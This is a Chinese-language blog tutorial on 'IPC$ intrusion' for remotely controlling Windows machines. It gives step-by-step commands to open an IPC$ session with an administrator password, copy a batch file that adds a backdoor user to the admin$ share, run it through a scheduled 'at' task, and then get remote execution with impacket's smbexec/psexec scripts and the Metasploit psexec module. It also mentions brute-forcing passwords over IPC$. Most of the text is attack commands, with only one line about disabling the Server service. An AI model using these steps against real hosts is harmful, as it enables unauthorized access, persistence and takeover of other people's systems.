ipc$入侵之遠程控制

前言:

IPC$和windows的SMB共享都是複用了445端口,它們都基於SMB協議實現,但是IPC$的作用範圍更大一些,它是服務器間進程間通信方式。
IPC$的登錄驗證方式可分爲:
1:匿名anonymous IPC$: 空賬號,空密碼可訪問,但是匿名IPC$的權限往往較低。
2:非匿名IPC$: 需要帳號密碼的驗證,不過這反過來也爲黑客提供了一種暴力破解windows系統賬戶密碼的方式
3:SMB:局域網文件傳輸協議 445端口 ,139,135,137都需要被打開。

利用方式(手動利用)

通過net share查看共享資源,當成功建立起了ipc$連接後,也是可以通過net share來查看的,通過圖片
可以看到下面的共享是默認開啓的,如果需要徹底禁止共享服務的話,可以在系統服務中禁止“server服務
在這裏插入圖片描述

建立連接ipc$,這裏jimolang1231...是被連接的機器密碼,administrator是被連接機器的賬號

net use \\被控ip\ipc$ 密碼 /user:賬號:建立ipc$連接

在這裏插入圖片描述
建立好了以後,可以通過net share來進行查看是否結果,在本地機器中新建bat文件,內容爲"net user admins jimolang1231.. /add"意思就是添加用戶。

copy 文件 \\被控ip\admin$:複製bat文件到被控機器中

在這裏插入圖片描述
查看是否成功上傳到目標機器中,是成功上傳的。

dir \\被控ip\admin$ 查看內容

在這裏插入圖片描述
查看被控機器當前設置,設置計劃任務,

net time \\被控ip:查看被控機時間

在這裏插入圖片描述
設置計劃任務,設置成功。

at \\被控ip 時間 \\被控ip\admin$\文件 :啓動任務

在這裏插入圖片描述
最後我們登錄到被控機器上通過cmd查詢得知,新用戶已經成功添加。
在這裏插入圖片描述
以上的利用方式是最基礎的手動來進行利用,下面介紹如何通過工具的方式來進行ipc$連接攻擊。

利用方式(工具利用)

這裏推薦的工具是impacket-master.zip 可以去github上下載。
下載解壓後,運行python setup.py install進行安裝包的安裝,我這裏就在kali中演示(windows也是如此)

winexec.py 賬號:密碼@被控ip地址:工作組環境
winexec.py DC/賬號:密碼被控@ip地址:域環境

在這裏插入圖片描述

smbexec.py賬號:密碼@被控ip 使用的方式和上面一樣

在這裏插入圖片描述

組後一個腳本psexec.py
和上面的利用方式也是一樣的,winexec.py、smbexec.py、psexec.py在這裏插入代碼片這三個腳本文件都impacket-master.zip 裏面。

當然了也可以直接在kali的msf中加載exploit/windows/smb/psexec模塊來進行ipc$攻擊,下面是參數的設置。在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章